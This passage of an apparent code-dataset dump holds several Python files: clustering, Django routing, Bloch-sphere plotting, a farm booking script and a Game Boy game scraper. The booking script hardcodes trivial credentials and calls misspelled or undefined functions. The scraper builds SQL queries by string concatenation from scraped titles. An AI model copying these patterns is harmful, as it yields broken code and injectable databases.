(d)-[:PART_OF]->(c2:Collection) \" \\\n # \"WHERE c1.alephCollection IN {acl} \" \\\n # \"AND c2.alephCollection IN {acl} \" \\\n # \"RETURN n, r, d LIMIT 5 \"\n # # q = q % (collections, collections)\n # for res in graph.data(q, acl=collections):\n # print dir(res.get('r'))\n # print res.get('r').__uuid__\n # # graph.delete_all()\n","sub_path":"aleph/graph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17117487","text":"from django.conf.urls import url, include\n\nfrom rest_framework import routers\n\nfrom .views 
import MerchantViewSet, list_merchants, list_status, export\n\nrouter = routers.DefaultRouter()\nrouter.register(r'', MerchantViewSet, 'Merchant')\n\nurlpatterns = [\n    url(r'^', include(router.urls), name='Restful API Merchant'),\n    url(r'^list', list_merchants, name='get_list_merchants'),\n    url(r'^status', list_status, name='get_list_status'),\n    url(r'^export', export, name='export_data_merchant'),\n]\n","sub_path":"sale_portal/merchant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497450697","text":"from typing import List\nimport numpy as np\nfrom scipy.special import softmax\n\n\ndef NBC(population):\n    \"\"\"Returns SEEDS ONLY\"\"\"\n    n = len(population)\n    if n == 1:\n        return population\n\n    mem = [[None]*n for _ in range(n)]\n\n    def dist(i, j) -> float:\n        if mem[i][j] is not None:\n            return mem[i][j]\n        x = p[i]\n        y = p[j]\n        t = np.sum(((x.val-y.val)**2))**.5\n        mem[i][j] = t\n        mem[j][i] = t\n        return t\n\n    p = sorted(population) # better to worse, reverse lt\n    edges = []\n    for i in range(1, n):\n        # ans = i\n        # maxyet=0\n        # for j in range(0,i):\n        #     t = np.sum(((p[i].val-p[j].val)**2))\n        #     if (t < maxyet):\n        #         ans = j\n        t = min(range(0, i), key=lambda j: dist(i, j))\n        edges.append((t, i))\n\n    # seed selection mirrors NBC_minsize below: keep p[0] plus every\n    # individual whose nearest-better edge is longer than phi * mu\n    mu = sum(dist(a, b) for a, b in edges) / len(edges)\n    phi = 1 # same cutoff factor as in NBC_minsize\n    seeds = [p[0]] + [p[i] for (t, i) in edges if dist(t, i) > phi * mu]\n\n    return seeds\n\n\ndef permute_softmax(edges, edge_lengths, temp=1):\n    soft = softmax(edge_lengths*temp)\n    print(edge_lengths)\n    assert (np.min(soft) > 0)\n\n    permutation = np.random.choice(\n        len(edges), len(edges), replace=False, p=soft)\n\n    return [edges[i] for i in permutation]\n\n\ndef permute_softmax2(edges, edge_lengths, temp=1):\n\n    ans = []\n\n    while edges:\n\n        soft = softmax(edge_lengths*temp)\n\n        index = np.random.choice(\n            len(edges), 1, replace=False, p=soft)[0]\n\n        ans.append(edges[index])\n        del edges[index]\n        edge_lengths = np.delete(edge_lengths, index)\n\n    return ans\n\n\ndef permute_softmax3(edges, edge_lengths, temp=1):\n    ans = []\n    count = 0\n\n    while edges:\n\n        soft = softmax(edge_lengths*temp)\n        num_indices = len(edges) - np.sum(soft == 0)\n\n        indices = np.random.choice(\n            len(edges), num_indices, replace=False, p=soft)\n\n        for i in indices:\n            ans.append(edges[i])\n        for index in sorted(indices, reverse=True):\n            del(edges[index])\n        edge_lengths = np.delete(edge_lengths, indices)\n\n        # print(count)\n        # count += 1\n\n    return ans\n\n\ndef NBC_minsize(population, minsize, temp=-1, phi=1,num_clusters=float(\"inf\")): # phi = 1 MAGIC numbers\n    p = sorted(population) # better to worse, reverse lt\n    n = len(p)\n\n    if (n == 1):\n        return [population]\n\n    mem = {}\n\n    def dist(i, j) -> float:\n        if (i, j) in mem:\n            return mem[(i, j)]\n        if (j, i) in mem:\n            return mem[(j, i)]\n        x = p[i]\n        y = p[j]\n        t = np.sum(((x.val-y.val)**2))**.5\n        mem[(j, i)] = t\n        return t\n\n    ans = {i: [] for i in range(0, n)}\n    for i in range(1, n):\n        t = min(range(0, i), key=lambda j: dist(i, j))\n        ans[t].append(i)\n\n    parent = [-1]*n\n    edges = []\n    for i in ans:\n        for j in ans[i]: # i is better, arrow points upwards,child up parent\n            parent[j] = i\n            edges.append((i, j))\n\n    mu = sum(dist(p, c) for p, c in edges)/len(edges)\n\n    fol = {}\n\n    def follow(node):\n        if node not in fol:\n            if node in ans:\n                fol[node] = 1 + sum(follow(i) for i in ans[node])\n            else:\n                fol[node] = 1\n        return fol[node]\n\n    if phi!=0:\n        edges = [e for e in edges if dist(e[0], e[1]) > phi * mu] # adding counter\n    edge_lengths = np.array([dist(e[0], e[1]) for e in edges])\n    # assert (np.min(edge_lengths) > 0)\n    # max_len = np.max(edge_lengths)\n    # edges = permute_softmax3(edges, edge_lengths, temp=temp)\n\n    
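# temp == -1 keeps the original deterministic behaviour: the longest\n    # edges are cut first; any other value samples the cut order\n    # stochastically from a softmax over edge lengths (permute_softmax3 above).\n    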
if (temp != -1):\n edges = permute_softmax3(edges, edge_lengths, temp=temp)\n else:\n edges.sort(key=lambda x: dist(x[0], x[1]), reverse=True)\n\n # if (temp==100000):# confirm\n # print(\"Normal\",edges)\n # print(\"Inf\",sorted(edges,key=lambda x: dist(x[0], x[1]), reverse=True))\n\n # if (dist(edges[0][0], edges[0][1]) == max_len):\n # print(\"good\")\n # else:\n # print(\"bad\")\n\n # edges.sort(key=lambda x: dist(x[0], x[1]), reverse=True)\n\n counter = 1\n\n for e in edges:\n if(counter >= num_clusters):\n break\n\n if follow(e[1]) >= minsize:\n t = e[0]\n while parent[t] != -1:\n t = parent[t]\n if follow(t) - follow(e[1]) >= minsize:\n counter += 1\n ans[e[0]].remove(e[1])\n parent[e[1]] = - 1\n t = e[0]\n while parent[t] != -1:\n fol[t] -= follow(e[1])\n t = parent[t]\n\n def rec(node, homies):\n homies.append(node)\n if node in ans:\n for i in ans[node]:\n rec(i, homies)\n\n species = []\n for s in range(n):\n if parent[s] == -1: # if i is a seed\n l = []\n rec(s, l)\n species.append(l)\n\n species = [[p[j] for j in i] for i in species]\n return species\n","sub_path":"nbc.py","file_name":"nbc.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"377601992","text":"import os\r\nimport datetime\r\nimport time\r\nimport re\r\n\r\nglobal storedUsername\r\nstoredUsername = \"1\"\r\nglobal storedPassword\r\nstoredPassword = \"1\"\r\n\r\ndef welcome():\r\n print(\"Select an option from the menu: \")\r\n print(\"1 - Login\")\r\n print(\"2 - Exit\")\r\n\r\n option = input()\r\n\r\n if option == \"1\":\r\n login()\r\n elif option == \"2\":\r\n exit()\r\n else:\r\n print(\"please select a valid option\")\r\n welcome()\r\n\r\n#LOGIN\r\n#LOGIN\r\n#LOGIN\r\n\r\ndef login():\r\n print (\"Welcome, please login\")\r\n print (\"Enter your Username\")\r\n username = str(input())\r\n if username == storedUsername:\r\n print (\"Username correct, enter password\")\r\n password = str(input())\r\n if password == storedPassword:\r\n print (\"Password correct\")\r\n menu()\r\n else:\r\n print(\"incorrect. login again.\")\r\n login()\r\n\r\n else:\r\n print (\"Your username doesnt match our database, try again\")\r\n login()\r\n\r\n\r\n#BOOKING - MAIN\r\n#BOOKING - MAIN\r\n#BOOKING - MAIN\r\n\r\ndef menu():\r\n print(\"Select an option from the menu: \")\r\n print(\"1 - Enter Details\")\r\n print(\"2 - Enter Food\")\r\n print(\"3 - Exit\")\r\n \r\n option = input()\r\n\r\n if option == \"1\":\r\n createBooking()\r\n elif option == \"2\":\r\n food()\r\n elif option == \"3\":\r\n exit()\r\n else:\r\n print(\"please select a valid option\")\r\n welcome()\r\n \r\n\r\ndef createBooking():\r\n #Create text file\r\n bookingCounter = 1\r\n while os.path.exists(\"booking%s.txt\" % bookingCounter):\r\n bookingCounter += 1\r\n\r\n #Enter Details:\r\n\r\n f = open(\"booking%s.txt\" % bookingCounter, \"w\")\r\n \r\n print (\"Enter customer details\")\r\n print (\"Please enter details: \")\r\n\r\n day = input(\"Enter date of arrival. 
(DD/MM/YYYY)\")\r\n dateValidation()\r\n f.write(\"Day of arrival: \" + day + \"\\n\")\r\n\r\n \r\n timea = input(\"Enter time of arrival\")\r\n timeVailidation(timea)\r\n f.write(\"Time of arrival: \" + timea + \"\\n\")\r\n\r\n\r\n timed = input(\"Enter time of departure\")\r\n timeValidation(timed)\r\n f.write(\"Time of departure: \" + timed + \"\\n\")\r\n\r\n\r\n customerName = input(\"Enter name\")\r\n f.write(\"Customer Name: \" + customerName + \"\\n\")\r\n\r\n \r\n email = input(\"Enter email\")\r\n while answer == False:\r\n if isValidEmail(email) == True :\r\n f.write(\"Customer Email: \" + email + \"\\n\")\r\n answer == True\r\n else:\r\n print (\"This is not a valid email address\")\r\n\r\n\r\n groupName = input(\"Enter group, party, school name\")\r\n f.write(\"Group, party, school name: \" + groupName + \"\\n\")\r\n\r\n \r\n address = input(\"Enter address\")\r\n f.write(\"Address: \" + address + \"\\n\")\r\n\r\n \r\n postcode = input(\"Enter postcode\")\r\n f.write(\"postcode: \" + postcode + \"\\n\")\r\n\r\n \r\n contactNumber = input(\"Enter contact number\")\r\n f.write(\"Contact Number: \" + contactNumber + \"\\n\" + \"\\n\")\r\n\r\n\r\n\r\n \r\n print (\"Enter group details\")\r\n print (\"Please enter details: \")\r\n \r\n adults = input(\"Enter number of adults\")\r\n f.write(\"Number of adults: \" + adults + \"\\n\")\r\n\r\n \r\n under18 = input(\"Enter number of children under 18\")\r\n f.write(\"Number of under 18's: \" + under18 + \"\\n\" + \"\\n\")\r\n\r\n\r\n \r\n \r\n print (\"Food Orders: \")\r\n \r\n burger = input(\"Regular beef burger, fries and drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of burgers: \" + burger + \"\\n\")\r\n\r\n \r\n chicken = input(\"Chicken Wrap, drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of chicken: \" + chicken + \"\\n\")\r\n\r\n \r\n chilli = input(\"Chilli con carne, drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of chilli: \" + chilli + \"\\n\" + \"\\n\")\r\n \r\n\r\n gineauPigs = input(\"Would you like to see the Gineau Pigs? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Gineau Pigs: \" + gineauPigs + \"\\n\")\r\n\r\n \r\n pony = input(\"Would you like to see the Pony's? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Pony Grooming: \" + pony + \"\\n\")\r\n\r\n \r\n cow = input(\"Would you like to see the Cow? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Cow Milking: \" + cow + \"\\n\")\r\n\r\n \r\n miniBeasts = input(\"Would you like to see the Mini Beasts? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Mini beasts: \" + miniBeasts + \"\\n\")\r\n\r\n \r\n tractor = input(\"Would you like to ride on the tractor? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Tractor Ride: \" + tractor + \"\\n\" + \"\\n\")\r\n \r\n\r\n tourGuide = input(\"Would you like a tour guide for the day? :\" + \"\\n\" + \"Yes/No?\")\r\n f.write(\"Tour Guide: \" + tourGuide + \"\\n\" + \"\\n\")\r\n\r\n \r\n f.close()\r\n exit()\r\n\r\n\r\n#VALIDATION\r\n#VALIDATION\r\n#VALIDATION\r\n\r\ndef dateValidation():\r\n try:\r\n valid_day = time.strptime(day, '%d/%m/%Y')\r\n return valid_day\r\n except ValueError:\r\n print('Invalid date!')\r\n day = input(\"Enter date of arrival. 
(DD/MM/YYYY)\")\r\n dateValidation(day)\r\n\r\ndef timeValidation():\r\n try:\r\n valid_timea = time.strptime(timea, '%H:%M')\r\n except ValueError:\r\n print('Invalid time!')\r\n\r\ndef isValidEmail(email):\r\n if len(email) > 7:\r\n if re.match(\"^.+@([?)[a-zA-Z0-9-.]+.([a-zA-Z]{2,3}|[0-9]{1,3})(]?)$\", email) != None:\r\n return True\r\n return False\r\n\r\n\r\n\r\n \r\n#main program\r\n#main program\r\n#main program\r\n \r\n\r\nwelcome()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"211795732","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyle\n\ndef plotbar3d(matrix):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n xwidth = 0.6\n ywidth = 0.6\n xsize, ysize = np.shape(matrix)\n x, y = np.meshgrid(range(xsize), range(ysize), indexing='ij')\n x = x.flatten() - xwidth/2\n y = y.flatten() - ywidth/2\n z = np.zeros(xsize*ysize)\n dx = xwidth*np.ones_like(z)\n dy = ywidth*np.ones_like(z)\n dz = matrix.flatten()\n\n ax.bar3d(x, y, z, dx, dy, dz, color='r')\n plt.xlabel('Row')\n plt.ylabel('Column')\n\ndef rho2rhoI(rhosIn, tseq, f10, f21):\n w10 = 2*np.pi*f10\n w21 = 2*np.pi*f21\n def U(t):\n return np.array([[1, 0, 0],\n [0, np.exp(-1j*w10*t), 0],\n [0, 0, np.exp(-2j*w21*t)]])\n return np.array([np.dot(np.dot(U(t).conj().T, rhosIn[i]), U(t))\n for i, t in enumerate(tseq)])\n\ndef Uframetransfer(theta, phi):\n return np.array([[np.cos(theta/2), -np.sin(theta/2)],\n [np.sin(theta/2)*np.exp(1j*phi), np.cos(theta/2)*np.exp(1j*phi)]])\n\ndef rho2newframe(rho, U):\n return np.dot(np.dot(U.conj().T, rho), U)\n\ndef rho2bloch(rho):\n \"\"\"Turn the density matrix to bloch vectors.\"\"\"\n sigmas = [pyle.tomo.sigmaX, pyle.tomo.sigmaY, pyle.tomo.sigmaZ]\n return np.array([np.trace(np.dot(rho, sigma)) for sigma in sigmas])\n\ndef xyzprojections(rhosIn):\n if rhosIn[0].shape[0]==3:\n rhos = np.array([rho[:-1,:-1] for rho in rhosIn])\n else:\n rhos = rhosIn[:]\n blochs = np.real(np.array([rho2bloch(rho) for rho in rhos]))\n # the imaginary parts are typically of magnitude of ~1e-16\n return blochs[:,0], blochs[:,1], blochs[:,2]\n\ndef rhos2thetaphi(rhosIn):\n \"\"\"Turn the density matrix to bloch parameters.\"\"\"\n x, y, z = xyzprojections(rhosIn)\n mag = np.sqrt(x**2 + y**2 + z**2)\n phi = np.angle(x + 1j*y)\n theta = np.arccos(z/mag)\n return theta, phi\n\ndef thetaphi2rho(theta, phi):\n rho = np.array([[(1.0+np.cos(theta))/2, np.sin(theta)/2*np.exp(-1j*phi)],\n [np.sin(theta)/2*np.exp(1j*phi), (1.0-np.cos(theta))/2]])\n return rho\n\ndef thetaphi2psi(theta, phi):\n return np.array([np.cos(theta/2), np.sin(theta/2)*np.exp(1j*phi)])\n\ndef plotTrajectory(rhosIn, bloch=True, labels=True, scatter=False):\n #If these are three level qubits, get rid of the |2> contribution\n if rhosIn[0].shape[0]==3:\n rhos = np.array([rho[:-1,:-1] for rho in rhosIn])\n else:\n rhos = rhosIn[:]\n blochs = np.real(np.array([rho2bloch(rho) for rho in rhos]))\n\n #draw a bloch sphere\n fig = plt.figure(figsize=(12,12))\n ax = Axes3D(fig)\n ax.set_xlim([-1.0, 1.0])\n ax.set_ylim([-1.0, 1.0])\n ax.set_zlim([-1.0, 1.0])\n ax.set_aspect('equal')\n if bloch:\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n\n x = np.outer(np.cos(u), np.sin(v))\n y = np.outer(np.sin(u), np.sin(v))\n z = np.outer(np.ones(np.size(u)), np.cos(v))\n 
ax.plot_surface(x, y, z, rstride=8, cstride=8, color ='0.8', alpha=0.1)\n #, cmap = cm.PuBu) #, alpha = 1.0)\n\n #Axis label\n if labels:\n ax.text(0, 0, 1, '|0>')\n ax.text(0, 0, -1, '|1>')\n ax.text(1, 0, 0, '|0> + |1>')\n ax.text(-1, 0, 0, '|0> - |1>')\n ax.text(0, 1, 0, '|0> + i|1>')\n ax.text(0, -1, 0, '|0> - i|1>')\n\n #Axis\n ax.plot([-1.2,1.2],[0,0],[0,0], color = '#e1a95f', linewidth=2) #X\n ax.plot([0,0],[-1.2,1.2],[0,0], color = '#228b22', linewidth=2) #Y\n ax.plot([0,0],[0,0],[-1.2,0], '--', color = '#ff0000', linewidth=2) #Z-\n ax.plot([0,0],[0,0],[0,+1.2], '--', color = '#00bfff', linewidth=2) #Z+\n # ax.set_aspect('equal')\n # draw the trajectory\n if not scatter:\n ax.plot(blochs[:,0],blochs[:,1],blochs[:,2], markersize=10)\n else:\n ax.scatter(blochs[:,0],blochs[:,1],blochs[:,2], c='r', marker='o', s=10)\n\ndef drawBlochSphere(bloch = True, labels = True):\n fig = plt.figure(figsize=(7,7))\n ax = Axes3D(fig)\n #draw a bloch sphere\n if bloch:\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n\n x = np.outer(np.cos(u), np.sin(v))\n y = np.outer(np.sin(u), np.sin(v))\n z = np.outer(np.ones(np.size(u)), np.cos(v))\n ax.plot_surface(x, y, z, rstride=8, cstride=8, color='0.8', alpha=0.1)\n #, cmap = cm.PuBu) #, alpha = 1.0)\n ax.set_aspect('equal')\n\n #Axis label\n if labels:\n ax.text(0, 0, 1, '|0>')\n ax.text(0, 0, -1, '|1>')\n ax.text(1, 0, 0, '|0> + |1>')\n ax.text(-1, 0, 0, '|0> - |1>')\n ax.text(0, 1, 0, '|0> + i|1>')\n ax.text(0, -1, 0, '|0> - i|1>')\n\n #Axis\n ax.plot([-1.2,1.2],[0,0],[0,0], color = '0.1', linewidth=2)\n ax.plot([0,0],[-1.2,1.2],[0,0], color = '0.1', linewidth=2)\n ax.plot([0,0],[0,0],[-1.2,1.2], color = '0.1', linewidth=2)\n ax.set_aspect('equal')\n\n return fig, ax\n\ndef plotctrlsequence(T, system):\n plt.figure(figsize=(7,5))\n uw = np.array([qubit.uw(T) for qubit in system.qubits]).T\n df = np.array([qubit.df(T) for qubit in system.qubits]).T\n rng_uw = max(np.amax(abs(uw)), 0.01)\n rng_df = max(np.amax(abs(df)), 0.01)\n for i in range(system.m):\n plt.subplot(system.m*2, 1, 2*i+1)\n plt.plot(T, uw[:,i].real, T, uw[:,i].imag)\n plt.ylabel('uw-xy')\n plt.ylim(-rng_uw*1.1, rng_uw*1.1)\n plt.legend(('X', 'Y'))\n\n plt.subplot(system.m*2, 1, 2*i+2)\n plt.plot(T, df[:,i])\n plt.ylabel('uw-detuning(q%i)' %(i+1))\n plt.ylim(-rng_df*1.1, rng_df*1.1)\n plt.xlabel('time [ns]')\n\n\ndef fixphase(phase):\n fix = 0\n for i in range(len(phase)-1):\n if abs(phase[i+1]+fix-phase[i])>0.8*np.pi:\n fix += -np.sign(phase[i+1]-phase[i])*2*np.pi\n else:\n pass\n phase[i+1] = phase[i+1] + fix\n return phase\n\ndef piLocator(xLocator=np.pi/4, yLocator=np.pi/4):\n ax = plt.subplot(111)\n xmajorLocator = plt.MultipleLocator(xLocator)\n xmajorFormatter = plt.FormatStrFormatter('%2.1f'+r'$\\pi$')\n ymajorLocator = plt.MultipleLocator(yLocator)\n ymajorFormatter = plt.FormatStrFormatter('%2.1f'+r'$\\pi$')\n ax.xaxis.set_major_locator(xmajorLocator)\n ax.xaxis.set_major_formatter(xmajorFormatter)\n ax.yaxis.set_major_locator(ymajorLocator)\n ax.yaxis.set_major_formatter(ymajorFormatter)\n ax.xaxis.grid(True, which='major')\n ax.yaxis.grid(True, which='major')\n return ax\n","sub_path":"xlpyle/simulation/drawtools.py","file_name":"drawtools.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251402980","text":"import pandas as pd\nimport re\nimport db_utils\nimport scrape_utils\nfrom fuzzywuzzy import fuzz\nimport time\n#WHEN PORTING THIS CODE PAY ATTENTION TO 
GB_ID AND TO THE GAMEFAQS SCRAPING TO CHANGE TO THE CORRECT CONSOLE\n#ALSO IN RESOLVE CONFLICTS WHEN APPENDING CONSOLE NAME, CHANGE TO CORRECT APPENDAGE\ndef scrapeGBGames():\n    \"\"\"Scrapes GB games info from wikipedia lists\"\"\"\n    global GB_ID\n    global listpro\n    listpro = scrape_utils.findSuitableProxy()\n    #listpro=set(['193.178.246.248:8080','27.98.206.187:3128'])\n    if(len(listpro)==0):\n        print(listpro) \n        return\n    GB_ID=5\n    url = r'https://en.wikipedia.org/wiki/List_of_Game_Boy_games'\n    tables = pd.read_html(url) # Returns list of all tables on page\n    games = tables[0]\n    titles = games[games.columns[0]].tolist()\n    developers = games[games.columns[1]].tolist() \n    publishers = games[games.columns[2]].tolist()\n    dateJP = games[games.columns[4]].tolist()\n    dateUS = games[games.columns[6]].tolist() \n    dateEU = games[games.columns[8]].tolist()\n    conflicting_indexes=[]\n    counter=20\n    for count in range(len(titles)-1,len(titles)):\n        if(type(dateJP[count]) is float and type(dateEU[count]) is float and type(dateUS[count]) is float):\n            continue\n        counter=counter-1\n        if(counter==0):\n            listpro = scrape_utils.findSuitableProxy()\n            while(len(listpro)==0):\n                print(\"trying to extract proxylist\")\n                time.sleep(5)\n                listpro = scrape_utils.findSuitableProxy()\n            counter=20\n        if(len(conflicting_indexes)>0):\n            print(\"CONFLICTING INDEXES ARE:\")\n            print(conflicting_indexes)\n            if(count==len(titles)-1):\n                resolveConflicts(conflicting_indexes,titles,developers,publishers,dateJP,dateEU,dateUS)\n                return\n        if(titles[count]==''):\n            return \n        print(\"doing iteration \"+str(count)+ \" for title \"+titles[count])\n        titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[count])\n        possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n        #print(possibleTitles,dateJP[count],dateUS[count],dateEU[count],developers[count],publishers[count])\n        newGame=True\n        gameDetails = []\n        gameDetails.append(GB_ID)\n        conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n        if(conflicts!=-1 and len(conflicts)>0):\n            conflicting_index=count\n            conflicting_indexes.append(conflicting_index)\n            continue\n        else:\n            newGameID=db_utils.insertGame(possibleTitles[0])\n            if(type(newGameID) is list):\n                gameDetails.append(newGameID[0])\n            else:\n                gameDetails.append(newGameID)\n        \n        if(len(possibleTitles)==2 and possibleTitles[1]!=\"\"):\n            db_utils.customQuery('UPDATE game SET alt_title=\"'+possibleTitles[1]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title is null')\n        if(len(possibleTitles)==3 and possibleTitles[2]!=\"\"):\n            db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[2]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n        if(len(possibleTitles)==4 and possibleTitles[3]!=\"\"):\n            db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[3]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n        #depending on regions\n        if(type(dateUS[count]) is float):\n            gameDetails.append(\"Unreleased\")\n        else:\n            gameDetails.append(dateUS[count])\n        if(type(dateEU[count]) is float):\n            gameDetails.append(\"Unreleased\")\n        else:\n            gameDetails.append(dateEU[count])\n        if(type(dateJP[count]) is float):\n            gameDetails.append(\"Unreleased\")\n        else:\n            gameDetails.append(dateJP[count])\n        gameDetails.append(\"\") #dateGEN\n        db_utils.insertGamePlatform(gameDetails)\n        if(newGame):\n            if(type(publishers[count]) is not float):\n                cleanPublishers = re.sub('\\[.{0,3}\\]','',publishers[count])\n                publishersSplit = 
re.split('(?<=[a-z])[A-Z].*|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|PAL|NA\\/PAL|JP\\/PAL|NA\\/JP|NA\\/EU',cleanPublishers)\n pubIDs = db_utils.insertPublishers(publishersSplit)\n db_utils.insertGamePublishers(gameDetails[1],pubIDs)\n if(type(developers[count]) is not float and developers[count]!='???'):\n devIDs = db_utils.insertDevelopers(re.split('(?<=[a-z]|[1-9])[A-Z]',developers[count])) \n db_utils.insertGameDevelopers(gameDetails[1],devIDs)\n infobox = scrape_utils.wikipediaInfoboxScraping(possibleTitles[0])\n if(infobox is not None):\n db_utils.saveInfoboxData(infobox,gameDetails[1],platformID=GB_ID)\n if('boxart' in infobox):\n gamefaqsScraping(possibleTitles[0],gameDetails[1],False,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n\ndef validDecision(dec):\n if dec==\"new\" or dec==\"newapp\" or dec==\"newtitle\" or str.isdigit(dec):\n return True\n return False\n\ndef resolveConflicts(conflicting_indexes,titles,developers,publishers,dateJP,dateEU,dateUS):\n #in database fix titles like final fantasy legends\n #delete info games on gb\n #check title with (GB)\n GB_ID=5\n print(\"conflicts nr\",len(conflicting_indexes))\n decisions=dict()\n newTitles=dict()\n for i in conflicting_indexes:\n if(i in decisions):\n continue\n titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[i])\n possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n print(\"DECISION \"+str(i)+ \" for title \"+titles[i])\n print(\"Considering \"+possibleTitles[0])\n for index in range(0,len(conflicts)):\n print(\"Enter \"+ str(index)+\" to merge with: \"+conflicts[index]['title']+\"(\"+str(conflicts[index]['similarity'])+\")\"+\" - \"+str(conflicts[index]['platforms']))\n decisions[i] = input(\"Enter new or newapp(newtitle to input custom title) or new to create new entry or NUMERICAL index to merge with existing: \")\n while(not validDecision(decisions[i])):\n decisions[i] = input(\"Invalid input, try again(new, newapp or index of game to merge): \")\n if(decisions[i]==\"newtitle\"):\n newTitles[i] = input(\"Input new desired game title:\")\n decisions[i]=\"new\"\n print(decisions)\n print(newTitles)\n\n counter=20\n for count in conflicting_indexes:\n if(count not in decisions):\n continue\n counter=counter-1\n if(counter==0):\n listpro = scrape_utils.findSuitableProxy()\n while(len(listpro)==0):\n print(\"trying to extract proxylist\")\n time.sleep(5)\n listpro = scrape_utils.findSuitableProxy()\n counter=20\n try:\n print(\"doing iteration \"+str(count)+ \" for title \"+titles[count])\n titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[count])\n possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n if(count in newTitles):\n possibleTitles[0]=newTitles[count]\n #print(possibleTitles,dateJP[count],dateUS[count],dateEU[count],developers[count],publishers[count])\n newGame=True\n gameDetails = []\n gameDetails.append(GB_ID)\n decision=decisions[count]\n if(str(decision)==\"new\" or str(decision)==\"newapp\"):\n print(\"Creating new game out of conflict\")\n if(str(decision)==\"newapp\"):\n newGameID=db_utils.insertGame(possibleTitles[0]+ \" (GB)\")\n else:\n newGameID=db_utils.insertGame(possibleTitles[0])\n if(type(newGameID) is list):\n 
gameDetails.append(newGameID[0])\n else:\n gameDetails.append(newGameID)\n elif(str.isdigit(decision)):\n print(\"Merging with \"+str(conflicts[int(decision)]))\n if r')' in conflicts[int(decision)]['title']:\n newTitle=re.sub('\\)','/GB)',conflicts[int(decision)]['title'])\n db_utils.customQuery('UPDATE game SET title=\"'+newTitle+'\" WHERE game.id='+str(conflicts[int(decision)]['gameid']))\n gameDetails.append(conflicts[int(decision)]['gameid'])\n newGame=False\n if(len(possibleTitles)==2 and possibleTitles[1]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title=\"'+possibleTitles[1]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title is null')\n if(len(possibleTitles)==3 and possibleTitles[2]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[2]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n if(len(possibleTitles)==4 and possibleTitles[3]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[3]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n #depending on regions\n if(type(dateUS[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateUS[count])\n if(type(dateEU[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateEU[count])\n if(type(dateJP[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateJP[count])\n gameDetails.append(\"\") #dateGEN\n db_utils.insertGamePlatform(gameDetails)\n except Exception as e:\n print(str(e))\n return\n try:\n if(newGame):\n if(type(publishers[count]) is not float):\n cleanPublishers = re.sub('\\[.{0,3}\\]','',publishers[count])\n publishersSplit = re.split('(?<=[a-z])[A-Z].*|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|PAL|NA\\/PAL|JP\\/PAL|NA\\/JP|NA\\/EU',cleanPublishers)\n pubIDs = db_utils.insertPublishers(publishersSplit)\n db_utils.insertGamePublishers(gameDetails[1],pubIDs)\n if(type(developers[count]) is not float and developers[count]!='???'):\n devIDs = db_utils.insertDevelopers(re.split('(?<=[a-z]|[1-9])[A-Z]',developers[count])) \n db_utils.insertGameDevelopers(gameDetails[1],devIDs)\n infobox = 